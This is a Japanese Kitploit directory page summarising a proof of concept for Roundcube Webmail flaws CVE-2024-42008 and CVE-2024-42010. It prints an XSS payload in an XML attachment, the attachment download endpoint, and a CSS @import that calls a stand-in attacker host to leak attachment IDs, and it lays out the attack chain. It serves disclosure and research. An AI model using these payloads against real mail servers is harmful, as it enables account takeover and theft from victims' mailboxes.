Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC — Roundcube の脆弱性 CVE-2024-42008 および CVE-2024-42010 の POC | Kitploit
ツール/GitHubGitHub/victoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティメールセキュリティ
GitHubvictoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc

Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC

Roundcube の脆弱性 CVE-2024-42008 および CVE-2024-42010 の POC

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
21年前未レビュー

Proof of Concept: CVE-2024-42008 and CVE-2024-42010

この概念実証(PoC)は、CSSインジェクションとクロスサイトスクリプティング(XSS)を可能にする、Roundcube Webmail の2つの脆弱性の悪用を実証します。攻撃は2つの段階で構成されます:

  1. 悪意のあるXML添付ファイルによるXSS(CVE-2024-42008)

    ファイルアップロードのチェックが不十分なため、JavaScriptコードを含むXMLファイルを添付ファイルとして送信できます。例:

    root@kitploit:~
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    

    これは既知の問題であり、CVE-2020-13965 として追跡されていました。緩和策は「添付ファイルを開く」オプションを無効にすることでした。しかし、このファイルは次のエンドポイントから依然としてアクセス可能です。

    root@kitploit:~
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    

    ここで UID は、この特定のメールボックス(すなわち INBOX)内のこの特定の添付ファイルの一意の識別子です。

  2. CSSインジェクションによるHTMLの外部流出(CVE-2024-42010)

    メールを送信する際、a で始まるドメインでホストされている場合、独自のCSSファイルを注入することが可能です。これと、脆弱な Roundcube ホストからのリクエストを処理する JavaScript サーバーファイルを通じて、悪意のある XSS 添付ファイルの UID を抽出することが可能です。

    送信するメールに以下のCSSをインポートします:

    root@kitploit:~
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    

    悪意のある添付ファイルのUIDを外部に送信するJSサーバー(roundcube-css-exploit.js)をホストします。

攻撃チェーン

  1. 自分のドメインで JavaScript サーバーをホストする
  2. 悪意のある XML 添付ファイルを含むメールを送信し、自分のドメインから CSS をインポートする
  3. 被害者がメールを開くと、UID が外部に流出する
  4. その後、XSS配信の好みの方法に応じて、添付ファイルのリンクを含む2通目のメールを送信するか、ユーザーをそこにリダイレクトすることができます。

出典: 政府機関のメールが危険にさらされる: Roundcube Webmail の重大なクロスサイトスクリプティング脆弱性 (Sonar 脆弱性研究チーム)

ツールをダウンロード